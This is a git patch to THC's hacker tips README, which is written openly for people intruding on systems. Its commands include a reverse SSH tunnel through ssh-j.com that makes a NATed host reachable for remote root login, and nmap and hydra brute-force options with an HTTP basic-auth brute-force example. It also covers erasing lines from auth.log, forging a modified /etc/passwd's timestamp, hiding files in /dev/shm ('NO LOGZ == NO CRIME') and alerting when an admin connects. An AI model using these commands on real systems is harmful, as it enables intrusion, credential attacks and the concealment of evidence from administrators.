From 317b0d4a56a09e02bd1951fdf1c6e316c317b871 Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Mon, 20 Mar 2023 10:51:28 +0000 Subject: [PATCH] html-basic --- README.md | 105 ++++++++++++++++++++++++++++++++---------------------- 1 file changed, 62 insertions(+), 43 deletions(-) diff --git a/README.md b/README.md index 3a57881..232ed5e 100644 --- a/README.md +++ b/README.md @@ -21,10 +21,9 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [SSH socks5 tunnel](#ssh-socks-tunnel) 1. [SSH to NATed host](#ssh-j) 1. [Network](#network) - 1. [ARP discover computers on the local network](#net-arp-discover) - 1. [ICMP discover local network](#net-icmp-discover) - 1. [Monitor all new TCP connections](#monitor-tcp) - 1. [Alert on all new TCP connections](#alert-on-connect) + 1. [Discover hosts](#discover) + 1. [Tcpdump](#tcpdump) + 1. [Tunnel and forwarding](#tunnel) 1. [Find your public IP address](#your-ip) 1. [Check reachability from around the world](#check-reachable) 1. [Check Open Ports](#check-open-ports) @@ -54,8 +53,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [authorized_keys](#backdoor-auth-keys) 1. [Remote access an entire network](#backdoor-network) 1. [Shell Hacks](#shell-hacks) - 1. [Shred files (secure delete)](#shred-erase) - 1. [Shred files without *shred*](#shred-without-shred) + 1. [Shred files (secure delete)](#shred) 1. [Restore the date of a file](#restore-timestamp) 1. [Clean logfile](#shell-clean-logs) 1. [Hide files from a User without root privileges](#shell-hide-files) @@ -283,6 +281,7 @@ The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now con On the host behind NAT: Create a reverse SSH tunnel to [ssh-j.com](http://ssh-j.com) like so: ```sh +## Cut & Paste on the host behind NAT. ssh_j() { local pw @@ -292,9 +291,8 @@ ssh_j() echo -e "To connect to this host: \e[0;36mssh -J ${pw,,}@ssh-j.com ${USER:-root}@${pw,,}\e[0m" ssh -o StrictHostKeyChecking=accept-new -o ServerAliveInterval=30 ${pw,,}@ssh-j.com -N -R ${pw,,}:22:${2:-0}:${3:-22} } -``` -```sh -ssh_j # Generates a random tunnel ID [e.g. 5dmxf27tl4kx] and keeps the tunnel connected. +# Generates a random tunnel ID [e.g. 5dmxf27tl4kx] and keeps the tunnel connected. +ssh_j ``` Then use this command from anywhere else in the world to connect as 'root' to '5dmxf27tl4kx' (the host behind the NAT): @@ -306,42 +304,51 @@ The ssh connection goes via ssh-j.com into the reverse tunnel to the host behind --- ## 3. Network - -**3.i. ARP discover computers on the local network** + +**3.i. Discover hosts** + ```sh +## ARP disocer computers on the local network nmap -r -sn -PR 192.168.0.1/24 ``` -This will Arp-ping all local machines just like *arping*. ARP ping always seems to work and is very stealthy (e.g. does not show up in the target's firewall). However, this command is by far our favourite: -```sh -nmap -thc -``` - -**3.ii. ICMP discover local network** - -...and when we do not have nmap and we can not do broadcast pings (requires root) then we use this: ```sh +## ICMP discover computers on the local netowrk for x in `seq 1 254`; do ping -on -c 3 -i 0.1 -W 200 192.168.1.$x | grep 'bytes from' | cut -f4 -d" " | sort -u; done ``` - -**3.iii. Monitor all new TCP connections** + +**3.ii. tcpdump** ```sh +## Monitor every new TCP connection tcpdump -n "tcp[tcpflags] == tcp-syn" + +## Play a *bing*-noise for every new SSH connection +tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done + +## Ascii output (for all large packets. Change to >40 if no TCP options are used). +tcpdump -s 2048 -nAq 'tcp and (ip[2:2] > 60)' ``` - -**3.iv. Alert on new TCP connections** - -Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from the target system (could be an admin!). + +**3.iii. Tunnel and forwarding** ```sh -tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done +## Connect to SSL (using socat) +socat stdio openssl-connect:smtp.gmail.com:465 + +## Connect to SSL (using openssl) +openssl s_client -connect smtp.gmail.com:465 +``` + +```sh +## Bridge TCP to SSL +socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465 ``` -**3.v. Find your public IP address** +**3.iv. Find your public IP address** ```sh curl ifconfig.me @@ -353,13 +360,7 @@ Get geolocation information about any IP address: ```sh curl https://ipinfo.io/8.8.8.8 | jq -``` - -``` curl http://ip-api.com/8.8.8.8 -``` - -``` curl https://cli.fyi/8.8.8.8 ``` @@ -370,12 +371,12 @@ curl --socks5 localhost:9050 --socks5-hostname localhost:9050 -s https://check.t ``` -**3.vi. Check reachability from around the world** +**3.v. Check reachability from around the world** The fine people at [https://ping.pe/](https://ping.pe/) let you ping/traceroute/mtr/dig/port-check a host from around the world, check TCP ports, resolve a domain name, ...and many other things. -**3.vii. Check Open Ports on an IP** +**3.vi. Check Open Ports on an IP** ```shell curl https://internetdb.shodan.io/1.1.1.1 @@ -386,6 +387,15 @@ curl https://internetdb.shodan.io/1.1.1.1 (This list is curated by Joey (?)) + +
+ GMail Imbeciles - CLICK HERE + +> You can not brute force GMAIL accounts. +> SMTP AUTH/LOGIN IS DISABLED ON GMAIL. +> All GMail Brute Force and Password Cracking tools are FAKE. +
+ All tools are pre-installed on segfault: ```shell ssh root@segfaul.net # password is 'segfault' @@ -415,7 +425,7 @@ T="192.168.0.1" Userful **Nmap** parameters: ```shell ---script-args userdb="${ULIST}",passdb="${PLIST}" +--script-args userdb="${ULIST}",passdb="${PLIST}",brute.firstOnly ``` Userful **Ncrack** parameters: @@ -430,6 +440,7 @@ Userful **Hydra** parameters: -l root # Set username -V # Show each login/password attempt -s 31337 # Set port +-S # Use SSL -f # Exit after first valid login ``` @@ -504,6 +515,15 @@ set pass_file /usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt run ``` +```shell +## HTML basic auth +echo admin >user.txt # Try only 1 username +echo -e "blah\naaddd\nfoobar" >pass.txt # Add some passwords to try. 'aaddd' is the valid one. +nmap -p80 --script http-brute --script-args \ + http-brute.hostname=pentesteracademylab.appspot.com,http-brute.path=/lab/webapp/basicauth,userdb=user.txt,passdb=pass.txt,http-brute.method=POST,brute.firstOnly \ + pentesteracademylab.appspot.com +``` + --- ## 4. File Encoding @@ -858,16 +878,15 @@ Use -T to use TOR. --- ## 7. Shell Hacks - + **7.i. Shred & Erase a file** ```sh shred -z foobar.txt ``` - -**7.ii. Shred & Erase without *shred*** ```sh +## SHRED without shred command shred() { [[ -z $1 || ! -f "$1" ]] && { echo >&2 "shred [FILE]"; return 255; } @@ -881,7 +900,7 @@ Note: Or deploy your files in */dev/shm* directory so that no data is written to Note: Or delete the file and then fill the entire harddrive with /dev/urandom and then rm -rf the dump file. -**7.iii. Restore the date of a file** +**7.ii. Restore the date of a file** Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*) @@ -890,7 +909,7 @@ touch -r /etc/shadow /etc/passwd ``` -**7.iv. Clear logfile** +**7.iii. Clear logfile** This will reset the logfile to 0 without having to restart syslogd etc: ```sh @@ -904,7 +923,7 @@ grep -Fv 'thc.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f ``` -**7.v. Hide files from that User without root privileges** +**7.iv. Hide files from that User without root privileges** Our favorite working directory is */dev/shm/*. This location is volatile memory and will be lost on reboot. NO LOGZ == NO CRIME. @@ -932,7 +951,7 @@ cd $'\t' ``` -**7.vi. Find out Linux Distro** +**7.v. Find out Linux Distro** ```sh # Find out Linux Distribution